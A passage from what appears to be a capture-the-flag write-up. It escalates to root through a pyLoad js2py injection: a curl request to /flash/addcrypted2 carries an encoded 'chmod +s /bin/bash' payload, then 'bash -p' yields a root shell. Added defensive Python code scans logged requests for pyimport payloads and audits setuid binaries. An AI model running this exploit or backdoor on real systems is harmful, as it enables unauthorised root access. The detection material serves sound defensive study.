systemd-private-6b2ead31914b4c5c916dded28dfc3521-systemd-resolved.service-u62Akh
tmpj9fasysz
tmux-1001
vmware-root_737-4257003961
It's there!! (dance of joy)
Right now everything after jk= is the URL encoding of touch /tmp/pwnd, so URL-encode chmod +s /bin/bash instead (the tool is everyone's favourite, CyberChef).
So the final payload is
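The reason this works is that pyLoad hands the `jk` parameter of /flash/addcrypted2 to js2py, and js2py's `pyimport` bridge lets that "JavaScript" import Python modules; the curl request above simply URL-encodes such a snippet. The real fix is a patched pyLoad (and keeping port 8000 bound to localhost, as it already is here), but while patching it helps to be able to spot these requests in captured traffic. The scanner below is an added example, not part of the writeup: it assumes request records of the form (method, path, body) from a reverse proxy or WAF that logs POST bodies, and the sample records are constructed, the third one reusing the body shown above.

```python
import re
from urllib.parse import unquote_plus

# Tokens that have no business inside a jk= JavaScript snippet: js2py's
# pyimport bridge and direct Python execution primitives.
SUSPECT = re.compile(r"\bpyimport\b|\bos\.system\b|\bsubprocess\b|\b__import__\b")

ADDCRYPTED2 = "/flash/addcrypted2"

# Constructed sample records (method, path, body). The third body is the
# request shown in the writeup; the second is a benign ClickNLoad-style call.
SAMPLE_REQUESTS = [
    ("GET", "/login", ""),
    ("POST", ADDCRYPTED2,
     "package=demo&crypted=AAAA&jk=function%20f(){return%20%22key%22};&passwords=aaaa"),
    ("POST", ADDCRYPTED2,
     "package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73"
     "%74%65%6d%28%22%74%6f%75%63%68%20%2f%74%6d%70%2f%70%77%6e%64%22%29;f=function%20f2(){};"
     "&passwords=aaaa"),
]


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body, splitting on '&' only.
    (Older urllib.parse.parse_qs also split on ';', which would cut the jk value
    in half, so the split is done by hand here.)"""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def inspect_request(method: str, path: str, body: str) -> list:
    """Return findings for one captured request; an empty list means nothing seen."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ADDCRYPTED2:
        return []
    findings = []
    for jk in parse_form(body).get("jk", []):
        hit = SUSPECT.search(jk)
        if hit:
            findings.append(f"jk contains {hit.group(0)!r}: {jk[:60]!r}")
    return findings


def scan(records) -> list:
    """records: iterable of (method, path, body); returns [(index, findings)] for hits."""
    hits = []
    for index, (method, path, body) in enumerate(records):
        findings = inspect_request(method, path, body)
        if findings:
            hits.append((index, findings))
    return hits


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS):
        print(f"request #{index}:", *findings, sep="\n  ")
```

Note that the check decodes the body first: the `jk` value in the captured request is fully percent-encoded, so a pattern match on the raw wire bytes would miss it. On the application side, js2py itself offers `disable_pyimport()` for code that must evaluate untrusted scripts, which removes the bridge the payload relies on.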
curl -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1:8000' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 184' \
--data-binary $'package=xxx&crypted=AAAA&jk=chmod%20%2Bs%20%2Fbin%2Fbash;f=function%20f2(){};&passwords=aaaa' \
$'http://127.0.0.1:8000/flash/addcrypted2'
sau@pc:/tmp$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
sau@pc:/tmp$ bash -p
bash-5.0# whoami
root
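The root step is the classic setuid-shell backdoor: once /bin/bash carries the s bit, `bash -p` keeps the effective uid instead of dropping it. A host baseline or EDR check should therefore compare the set of setuid/setgid files against a known-good list and call out any shell or interpreter among them. The auditor below is an added example, not from the writeup; its allowlist is illustrative, and `demo()` plants a constructed setuid file in a scratch directory rather than touching the real /bin/bash.

```python
import os
import stat
import tempfile

# Illustrative baseline of setuid/setgid binaries expected on a stock Ubuntu
# host (constructed; derive the real list from a known-good image).
EXPECTED_SETUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/newgrp",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount", "/usr/bin/pkexec",
}
# Programs that hand the caller an interactive shell or interpreter; with the
# setuid bit (cf. `bash -p` above) they are an immediate root shell.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "python3", "perl"}


def find_setuid(root: str) -> list:
    """Walk `root` and return (path, permission bits, owner uid) for every regular
    file with the setuid or setgid bit, the same thing `find / -perm -4000` does."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, stat.S_IMODE(st.st_mode), st.st_uid))
    return hits


def classify(hits, allowlist=EXPECTED_SETUID) -> list:
    """Turn raw hits into alerts: anything outside the baseline is reported, and a
    setuid shell or interpreter is named explicitly."""
    alerts = []
    for path, mode, uid in hits:
        if path in allowlist:
            continue
        if os.path.basename(path) in SHELLS:
            reason = "setuid/setgid shell or interpreter"
        else:
            reason = "setuid/setgid binary not in baseline"
        if uid == 0:
            reason += " (root-owned)"
        alerts.append((path, f"{mode:04o}", reason))
    return alerts


def demo() -> list:
    """Plant a constructed setuid 'bash' in a scratch directory and audit it, so the
    check can be exercised without touching the real system."""
    scratch = tempfile.mkdtemp(prefix="suid-audit-")
    fake_bash = os.path.join(scratch, "bash")
    with open(fake_bash, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(fake_bash, 0o4755)  # same bits the writeup's chmod +s produces (minus setgid)
    return classify(find_setuid(scratch))


if __name__ == "__main__":
    for alert in demo():
        print(alert)
    # Real use on a host: for alert in classify(find_setuid("/")): print(alert)
```

Run periodically and diffed against the previous result, this turns the `-rwsr-sr-x` on /bin/bash above into an alert within one scan interval; the same diff also catches new setuid files dropped anywhere writable, which is the more common variant.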
Got root.txt!